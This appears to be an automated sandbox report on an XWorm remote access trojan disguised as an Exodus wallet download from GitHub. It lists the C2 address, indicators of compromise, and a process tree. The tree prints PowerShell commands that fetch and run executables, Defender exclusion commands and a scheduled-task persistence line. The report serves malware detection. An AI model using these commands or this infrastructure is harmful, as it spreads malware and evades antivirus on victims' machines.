xworm | hxxps://github[.]com/ek4o/fake-exodus/releases/tag/ekoTools

Resubmissions

03/03/2025, 16:00

250303-tf222asjz2 5

03/03/2025, 15:28

250303-swbpca1nz4 10

02/03/2025, 14:26

250302-rr1x1awygx 10

Analysis

max time kernel
302s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
03/03/2025, 15:28

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/ek4o/fake-exodus/releases/tag/ekoTools

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

Y2rnj2CSRObOXXLb

Attributes

Install_directory
%ProgramData%
install_file
System.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1404-292-0x0000000002730000-0x000000000273E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
88	6136	powershell.exe
91	6136	powershell.exe
92	5540	powershell.exe
101	5540	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5540	powershell.exe
6136	powershell.exe
5708	powershell.exe
5172	powershell.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
91	6136	powershell.exe
101	5540	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	ExodusInject.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	AggregatorHost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	Exodus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	Exodus.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	AggregatorHost.exe

Executes dropped EXE 8 IoCs

pid	Process
912	ExodusInject.exe
1376	Exodus.exe
1404	AggregatorHost.exe
6096	System.exe
5848	System.exe
1048	System.exe
3808	Exodus.exe
5688	System.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
90	raw.githubusercontent.com
91	raw.githubusercontent.com
101	raw.githubusercontent.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ExodusLoader.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
6052	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "19"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings	OpenWith.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5580	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3876	msedge.exe
3876	msedge.exe
5012	msedge.exe
5012	msedge.exe
844	identity_helper.exe
844	identity_helper.exe
516	msedge.exe
516	msedge.exe
6136	powershell.exe
6136	powershell.exe
6136	powershell.exe
5540	powershell.exe
5540	powershell.exe
5540	powershell.exe
5708	powershell.exe
5708	powershell.exe
5708	powershell.exe
5172	powershell.exe
5172	powershell.exe
5172	powershell.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe
4304	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	6136	powershell.exe
Token: SeDebugPrivilege	5540	powershell.exe
Token: SeDebugPrivilege	912	ExodusInject.exe
Token: SeBackupPrivilege	5824	vssvc.exe
Token: SeRestorePrivilege	5824	vssvc.exe
Token: SeAuditPrivilege	5824	vssvc.exe
Token: SeDebugPrivilege	5708	powershell.exe
Token: SeDebugPrivilege	5172	powershell.exe
Token: SeDebugPrivilege	1404	AggregatorHost.exe
Token: SeDebugPrivilege	1404	AggregatorHost.exe
Token: 33	5184	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5184	AUDIODG.EXE
Token: SeDebugPrivilege	6096	System.exe
Token: SeDebugPrivilege	5848	System.exe
Token: SeDebugPrivilege	1048	System.exe
Token: SeRestorePrivilege	4080	7zG.exe
Token: 35	4080	7zG.exe
Token: SeSecurityPrivilege	4080	7zG.exe
Token: SeSecurityPrivilege	4080	7zG.exe
Token: SeDebugPrivilege	5688	System.exe
Token: SeShutdownPrivilege	2704	shutdown.exe
Token: SeRemoteShutdownPrivilege	2704	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe
1376	Exodus.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe
5012	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
380	OpenWith.exe
3752	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5012 wrote to memory of 4992	5012	msedge.exe	86
PID 5012 wrote to memory of 4992	5012	msedge.exe	86
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 2008	5012	msedge.exe	87
PID 5012 wrote to memory of 3876	5012	msedge.exe	88
PID 5012 wrote to memory of 3876	5012	msedge.exe	88
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89
PID 5012 wrote to memory of 3592	5012	msedge.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/ek4o/fake-exodus/releases/tag/ekoTools
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8755046f8,0x7ff875504708,0x7ff875504718
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
  2⤵
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:1992
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5348 /prefetch:8
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:3764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:1
  2⤵
  PID:5752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
  2⤵
  PID:2820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:3308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,16822181859099263535,2030611005074192158,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:4008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2648

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1408

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5232

C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe
"C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5976
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\640.tmp\641.tmp\642.bat C:\Users\Admin\Downloads\ExodusWallet\ExodusLoader.exe"
  2⤵
  PID:6116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5540
- - C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe
    "C:\Users\Admin\Downloads\ExodusWallet\ExodusInject.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3157.tmp.bat""
      4⤵
      PID:2636
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:6052
- - C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe
    "C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:1376

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5824

C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
C:\Users\Admin\AppData\Roaming\AggregatorHost.exe
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1404
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5580
- C:\Windows\system32\shutdown.exe
  shutdown.exe /f /s /t 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2704

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x49c 0x4b4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5184

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6096

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5848

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1048

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:380

C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe
"C:\Users\Admin\Downloads\ExodusWallet\Exodus.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3808

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap22196:6838:7zEvent16306 -ad -saa -- "C:\Users\Admin\Downloads\ExodusWallet\ExodusWallet"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\ProgramData\System.exe
C:\ProgramData\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5688

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38cd855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3752

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:6024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

